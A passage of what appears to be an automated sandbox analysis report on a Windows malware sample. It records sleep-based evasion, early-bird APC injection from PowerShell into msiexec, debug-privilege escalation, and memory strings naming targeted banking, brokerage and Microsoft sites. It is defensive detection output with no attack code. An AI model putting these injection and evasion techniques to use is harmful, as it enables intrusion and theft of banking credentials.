Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -596061s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595952s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595392s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -594717s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -594609s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_00406167 FindFirstFileA,FindClose,	1_2_00406167
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00405705
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_00402688 FindFirstFileA,	1_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596061	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595392	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594717	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: msiexec.exe, 00000006.00000002.2571166277.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2571166277.0000000005AEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: msiexec.exe, 00000006.00000002.2584830754.00000000227FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\lkETeneRL3.exe

API call chain: ExitProcess graph end node

graph_1-3488

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 6_2_004CC147 LdrInitializeThunk,

6_2_004CC147

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3780000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
